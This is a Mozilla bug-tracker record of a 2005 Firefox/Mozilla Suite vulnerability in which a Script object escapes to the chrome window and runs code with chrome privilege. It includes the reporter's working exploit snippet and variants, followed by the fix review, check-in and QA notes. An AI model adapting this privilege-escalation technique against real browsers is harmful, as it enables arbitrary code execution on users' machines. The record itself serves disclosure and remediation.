new Script() can access chrome window and run arbitrary code with chrome privilege

RESOLVED FIXED

Status

()

Core
Security
RESOLVED FIXED
12 years ago
11 years ago

People

(Reporter: moz_bug_r_a4, Assigned: brendan)

Tracking

({fixed-aviary1.0.4, fixed1.7.8})

Trunk
x86
Windows XP
fixed-aviary1.0.4, fixed1.7.8
Points:
---
Dependency tree / graph
Bug Flags:
blocking1.7.8 +
blocking-aviary1.0.4 +
in-testsuite ?

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:fix] trunk version rolled into 281988)

Attachments

(4 attachments)

(Reporter)

Description

12 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3:
missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another
event handler that can be used to make chrome access non-DOM JS property
(related to Bug 289961).

Mozilla 1.7.7:
hrefForClickEvent (in contentAreaClick.js) is the function that can be used to
make chrome access non-DOM JS property (related to Bug 290324).

There is the way to circumvent the fix represented in bug 289074 comment 79. The
code in Script object can access |arguments.callee.__parent__| that is the
chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome
privilege.

Exploit:

  var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";

  var script = (function() {
    function x() { new Object(); }
    return new Script(scriptCode);
  })();

  document.body.__defineGetter__("type", script);
  var event = document.createEvent("Events");
  event.initEvent("PluginNotFound", true, true);
  document.body.dispatchEvent(event);

note:
It is important that how to create Script object. A, B, and C cause this error:
"Error: arguments is not defined". I don't know why D can access |arguments|.

A)
  var script = new Script(scriptCode);

B)
  var script = (function() {
    return new Script(scriptCode);
  })();

C)
  var script = (function() {
    function x() { "a"; }
    return new Script(scriptCode);
  })();

D)
  // any Object (window, document, new Array(), ...)
  var anyObj = new Object();
  var script = (function() {
    function x() { anyObj; }
    return new Script(scriptCode);
  })();


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414


Reproducible: Always

Steps to Reproduce:
(Reporter)

Comment 1

12 years ago
Created attachment 181108 [details]
testcase 1

for Firefox/1.0.3
(Reporter)

Comment 2

12 years ago
Created attachment 181110 [details]
testcase 2

for Mozilla/1.7.7
(Reporter)

Comment 3

12 years ago
Created attachment 181111 [details]
testcase 3

each of the ways to create Script object
(Assignee)

Comment 4

12 years ago
Testcase 1 is quite clever.  Another bounty for moz_bug_r_a4!

The patch in bug 290324 stops testcase 2.

Testcase 3 merely shows how to get an outer function invocation to have an
activation (Call in SpiderMonkey) object: nest an inner function that uses a
non-local identifier.

/be
Assignee: dveditz → brendan
Status: UNCONFIRMED → NEW
Ever confirmed: true
(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
(Assignee)

Comment 6

12 years ago
Er, dbaron points out that testcase 2 is for the suite.  It's the suite version
of testcase 1, I guess.

More tomorrow.  Thanks again, moz_bug_r_a4.

/be
Status: NEW → ASSIGNED
Blocks: 256195
Flags: blocking-aviary1.1+
Flags: blocking-aviary1.0.4+
Whiteboard: [sg:fix]
the more js can interact with chrome, the more exploits.

especially if chrome executes js.
(Assignee)

Comment 8

12 years ago
Created attachment 181234 [details] [diff] [review]
fix
Attachment #181234 - Flags: superreview?(dbaron)
Attachment #181234 - Flags: review?(jst)
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval-aviary1.0.4?
(Assignee)

Comment 9

12 years ago
Comment on attachment 181234 [details] [diff] [review]
fix

jst, feel free to review too.

/be
Attachment #181234 - Flags: review?(jst) → review?(shaver)
Comment on attachment 181234 [details] [diff] [review]
fix

r=shaver
Attachment #181234 - Flags: review?(shaver) → review+
(Assignee)

Comment 11

12 years ago
Thanks to bz for some productive discussion, part of which suggested this patch.

/be
Comment on attachment 181234 [details] [diff] [review]
fix

I really don't understand this anymore, but sr=dbaron.
Attachment #181234 - Flags: superreview?(dbaron) → superreview+
Flags: blocking1.8b2+
Flags: blocking1.7.8+
Depends on: 281988
Whiteboard: [sg:fix] → [sg:fix] trunk version rolled into 281988

Updated

12 years ago
Flags: blocking1.8b2+
Flags: blocking-aviary1.1+
(Assignee)

Comment 13

12 years ago
Comment on attachment 181234 [details] [diff] [review]
fix

Got dveditz and drivers approval on IRC.  Checking in, with the same change to
obj_eval (indirect call error).

/be
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval1.7.8+
Attachment #181234 - Flags: approval-aviary1.0.4?
Attachment #181234 - Flags: approval-aviary1.0.4+
(Assignee)

Comment 14

12 years ago
Checked into branches.

/be
Status: ASSIGNED → RESOLVED
Last Resolved: 12 years ago
Resolution: --- → FIXED

Updated

12 years ago
Flags: blocking-aviary1.0.5+ → blocking-aviary1.0.4+

Updated

12 years ago
Attachment #181234 - Flags: approval-aviary1.0.5+ → approval-aviary1.0.4+
other than the attached test cases, are there other areas or things we could
test to ensure that this didn't regress anything? thanks!
In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

A)
ReferenceError: arguments is not defined

B)
ReferenceError: arguments is not defined

C)
ReferenceError: arguments is not defined

D)
[object Object]

was D) supposed to be fixed?
Keywords: fixed-aviary1.0.4, fixed1.7.8
Clearing security flag from announced vulnerabilities fixed in Firefox
1.0.4/Mozilla 1.7.8
Group: security
Blocks: 256197
No longer blocks: 256195
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.